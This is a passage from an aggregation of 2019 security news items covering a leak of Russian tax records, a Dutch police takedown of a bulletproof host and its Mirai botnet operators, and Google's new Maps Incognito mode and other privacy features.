Multiple databases were stored in the cluster. Some held random and publicly sourced data; two held tax data and personally identifiable information about Russian citizens, most of them from Moscow and the surrounding area. One database had more than 14 million personal and tax records from 2010 to 2016; another had more than 6 million records from 2009 to 2015.

The records held information including full name, address, residency status, passport number, phone number, tax ID number, employer name and phone number, and tax amount. None of the data was encrypted, researchers report, and it was left exposed for more than a year.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/cloud/20m-russians-personal-tax-records-exposed-in-data-leak/d/d-id/1335984?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Huygens if true: Dutch police break up bulletproof hosting outfit and kill Mirai botnet

Dutch police said in a translated news release that they have busted a local ‘bulletproof’ server hosting operation in a major takedown that also nabbed a pair of Mirai botnet operators.

The Netherlands’ National Criminal Investigation Department and National Cyber Security Center operated jointly to track down and seize five servers that they say were being used as an underground ‘bulletproof’ hosting service for criminals.

The servers, housed at an unnamed data center in Amsterdam, had been the subject of thousands of complaints of malware infections as their operators had used the boxes to run exploits and control infected machines.

In this case, the police say, the people controlling those servers were a pair of Dutch nationals who had been running a Mirai botnet with cover from the bulletproof host. The duo, a 24-year-old man from Veendam and a 28-year-old man from Middelburg, had been offering the network of Mirai-infected devices as a for-hire distributed denial-of-service tool.

“The investigation also revealed that this botnet was very aggressively trying to infect other devices, up to over a million attempts per month on one device,” the translated police statement reads.

“Which DDoS attacks can be attributed to this botnet is part of the further investigation.”

Police said they plan to charge the pair with crimes including, but not limited to, computer intrusion and spreading malware. The cops hope that, by seizing the servers, they can take down this botnet once and for all.

The bust-up of a locally based bulletproof host (a term used for server providers who don’t ask questions of their customers and typically ignore takedown requests) should also prove significant.

Shady hosting operations have typically been associated with poorer, strife-ridden areas that have little in the way of government and police oversight. But a bulletproof host located nearby in a major city offers a number of advantages, including reliability and lower latencies, that would make the Amsterdam datacenter a hot commodity with local cybercriminals.

Meanwhile, users and admins who are worried about falling victim to Mirai and other botnet malware should first reset the device to get rid of any locally running code, then change default passwords, double-check their firewall settings and update all firmware. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/10/03/dutch_cops_bust_mirai/

Google Maps gets Incognito fig leaf: We’ll give you vague peace of mind if you hold off those privacy laws

After last year acknowledging that Google Maps stores location data even when told not to, the Chocolate Factory plans to give Maps the same misunderstood form of privacy offered by its Chrome browser, otherwise known as Incognito mode.

“When you turn on Incognito mode in Maps, your Maps activity on that device, like the places you search for, won’t be saved to your Google Account and won’t be used to personalize your Maps experience,” said Eric Miraglia, director of product management in Google’s privacy and data protection office, in a blog post.

Incognito mode, coming to Google Maps for Android this month and Google Maps for iOS “soon,” will pause real-time location sharing, as well as relevant notifications. It will prevent updates to users’ Location History and any Maps personalization. But it won’t provide the freedom from scrutiny implied by its name.

Just as Chrome’s Incognito mode offers only partial privacy – it prevents Chrome from saving browser activity but does nothing to prevent websites, network operators and internet service providers from tracking browsing activity – Maps Incognito mode won’t stop ISPs, apps, voice search or other Google services from capturing location data, if granted permission or able to do so regardless. And it won’t stop the selling of location data.

The Register asked Google how Maps Incognito mode might affect the kind of information it could turn over to authorities if presented with a lawful demand for data. According to the internet titan, it would not be able to provide Location History data from a mobile device using Incognito mode. But as this feature is device specific, other gadgets on the same Google Account may be able to provide location data if the user has opted to enable Location History for the account. And the web giant could still produce other types of data that could be used to derive an approximate location (an IP address, for example) if required to do so under a valid legal process.

If your threat-model fear is that other people who might use your device will shudder at your shameful travels, then Maps Incognito mode may help. If your concern is surveillance capitalism and the ad-industrial complex, this isn’t the privacy you’re looking for.

Maps’ newfound sense of modesty comes amid Google’s broader effort to shore up security and privacy across its various platforms, even as it lobbies against privacy regulation.

YouTube is also showing signs of data shame. After adding a data retention setting to the Location History and Web & App Activity records in Google Accounts in May, the Chocolate Factory has just extended auto-deletion to YouTube History. Video watchers can now select a data retention period of three months, 18 months or manual deletion – for those who prefer to wait until investigators are knocking at the door.

Meanwhile, Google has taken its Password Checkup extension and baked it into the password manager it offers through Chrome and Google Accounts. Password Checkup will check to see whether user passwords have shown up in public password dumps, whether they’re weak and whether they’ve been reused across multiple sites.

Consistent with Google’s newfound sensitivity about info hoarding, Google Assistant will soon be empowered to delete data on demand, though only a week’s worth.

“In the coming weeks, you’ll be able to delete Assistant activity from your Google Account just by saying things like ‘Hey Google, delete the last thing I said to you’ or ‘Hey Google, delete everything I said to you last week,'” said Miraglia.

If you want to delete more than a week’s worth of smart speaker banter, Google Assistant will balk and direct you to do it yourself through your Google Account. The fun begins next week for English users and next month in other languages. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/10/02/google_maps_incognito/